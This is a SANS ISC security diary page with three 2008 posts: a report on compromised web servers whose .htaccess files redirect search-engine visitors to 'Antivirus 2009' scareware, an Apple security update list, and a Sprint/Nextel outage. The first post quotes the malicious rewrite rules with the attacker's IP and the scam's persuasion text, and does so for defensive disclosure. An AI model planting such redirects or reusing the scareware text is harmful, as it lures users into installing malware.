Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Fake antivirus 2009 and search engine results

Published: 2008-09-15
Last Updated: 2008-09-16 01:15:04 UTC
by donald smith (Version: 1)
1 comment(s)

Web servers have been compromised and their .htaccess files have been modified.

Here you can see an example of a modified .htacces
http://forums.devnetwork.net/viewtopic.php?f=6&t=85984

"# RewriteEngine On
# RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
# RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
# Errordocument 404 http://87.248.180.88/in.html?s=hg_err
"

Another site that was compromised and searches redirected is discussed here:

http://groups.google.com/group/Google_Webmaster_Help-Indexing/msg/0cd2cafd907a0380


I don't know how the systems are being compromised at this point.

I modified the names of the sites in use below substituting 3 for e to prevent further search engine hit increases:)

Their .htaccess is being modified to rewrite requests. Specifically they
are redirecting to sites that "advertise" antivirus2008 or antivirus2009 when several search engines try to spider the original site.
They redirect most of the search engines there (google, yahoo, altavista...).
I believe that is how they are getting their fake av into the search engines with a HIGH hit rate.

The site I was seeing in use was int3rn3t-d3f3ns3s .com
Which is an "ad" for anti-virus2009. Here is the "scary text" from
freescan.php that is being used to convince victims to load this fake-av software.

 "ATTENTION! If your computer is infected, you could suffer
data loss,erratic PC behaviour, PC freezes and crashes.

Detect and remove viruses before they damage your computer!
Antivirus 2009 will perform a quick and 100% FREE scan of your computer for Viruses, Spyware and Adware.

Do you want to install Antivirus 2009 to scan your computer for malware now? (Recommended)


'Antivirus 2009 will scan your system for threats now.

Please select "RUN" or "OPEN" when prompted to start the installation.

This file has been digitally signed and independently certified as 100% free of viruses, adware and spyware."


int3rn3t-d3f3ns3s.com is at 84.16.252.73 I recommend blocking that at your enterprise gateway.
Prt3ctionactiv3scan .com which is mentioned in the sunbelt blog is at 78.159.118.168 blocking that
at your gateway is also recommended.

There is a blog here about some of these fake av sites.
http://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security.html
Microsoft mvp Harry Waldron blogged about it here.
http://msmvps.com/blogs/harrywaldron/archive/2008/08/15/antivirus-2009-avoid-these-fake-antivirus-trojan-attacks.aspx
The popups they use are so convincing that the daughter of fellow handler Deb Hale installed the 2008 version of it.
http://isc.sans.org/diary.html?storyid=4849
Sunbelt did a good write up of it here and has been tracking the sites involved.
http://sunbeltblog.blogspot.com/2008/09/scam-sites-update-iii.html
If you need antivirus software icsa labs has a useful collection of valid links here:
https://www.icsalabs.com/icsa/topic.php?tid=cfe0$3d83e732-011a28d6$5ac9-0f77e15b

1 comment(s)

MacOSX 10.5.5 and Security Update

Published: 2008-09-15
Last Updated: 2008-09-16 00:43:07 UTC
by Joel Esler (Version: 3)
0 comment(s)

Just hitting the streets, as we speak, Apple released OSX update 10.5.5.  Built into 10.5.5 is Security Update 2008-006, marking the 6th major security update of the year.  So aside from the ton of updates in 10.5.5 for OSX Leopard, check out the below updates included with it.

Keep in mind that Security Update is not just for 10.5 (OSX Leopard), being that it is also available for 10.4, Desktop and Server releases.

This update releases updates to the following items:

ATS -- Apple Type Services -- CVE-2008-2305

BIND --

10.5 -- Updated to 9.4.2-P2

10.4.11 -- Updated to 9.3.5-P2

ClamAV --  Antivirus included with OSX Server

Updated to version 0.93.3.

CVE-2008-1100, CVE-2008-1387, CVE-2008-0314, CVE-2008-1833, CVE-2008-1835, CVE-2008-1836, CVE-2008-1837, CVE-2008-2713, CVE-2008-3215

Directory Services x2 -- (Something I found interesting -- Vulnerability reported by the "IT Department of the West Seneca Central School District".  Not your usual reporter.  Very nice) -- CVE-2008-2329

Finder  x2 -- CVE-2008-2331, CVE-2008-3613

ImageIO x4 -- CVE-2008-2327, CVE-2008-2332, CVE-2008-3608, CVE-2008-1382

Kernel -- CVE-2008-3609

libresolv -- CVE-2008-1447

Login Windows x2 -- CVE-2008-3610, CVE-2008-3611

mDNSResolver -- CVE-2008-1447

OpenSSH -- CVE-2008-1483, CVE-2008-1657

QuickDraw Manager -- CVE-2008-3614

Ruby -- CVE-2008-2376

SearchKit -- CVE-2008-3616

System Configuration -- CVE-2008-2312 (For 10.4.11)

System Preferences x2 -- CVE-2008-3617, CVE-2008-3618

Time Machine -- CVE-2008-3619

VideoConference -- CVE-2008-3621

Wiki Server -- CVE-2008-3622

So, all in all, quite a few updates here in this one.  I recommend the download for all the machines that it applies to.

-- Joel Esler http://www.joelesler.net

Keywords:
0 comment(s)

Sprint/Nextel Messaging Down?

Published: 2008-09-15
Last Updated: 2008-09-16 00:17:18 UTC
by Joel Esler (Version: 3)
0 comment(s)

We've received a report about a major backlog of messages going through messaging.sprint.com and messaging.nextel.com.  Since Nextel and Sprint are the same company, is there a correlation?  Most likely.

Is anyone else experiencing this?

Update:  I haven't heard anything else about this today.

Update 2:  A reader writes in to tell us about a memo he received from Sprint/Nextel.  A quote from the letter:

"Effective September 15, 2008, Business Connection Enterprise Edition (Network & Server solution) will be decommissioned.  Sprint is focusing on core solutions our customers require. Based on our review, Sprint will focus on two standard products that comprise the majority of the wireless email market: BlackBerry and Windows Mobile.  These products comprise the majority of current and future wireless email users. These products also have enhanced technical and device support available to you now and into the future."

Don't know if this is related, but, it possibly could be.

 

-- Joel Esler http://www.joelesler.net

Keywords:
0 comment(s)
Diary Archives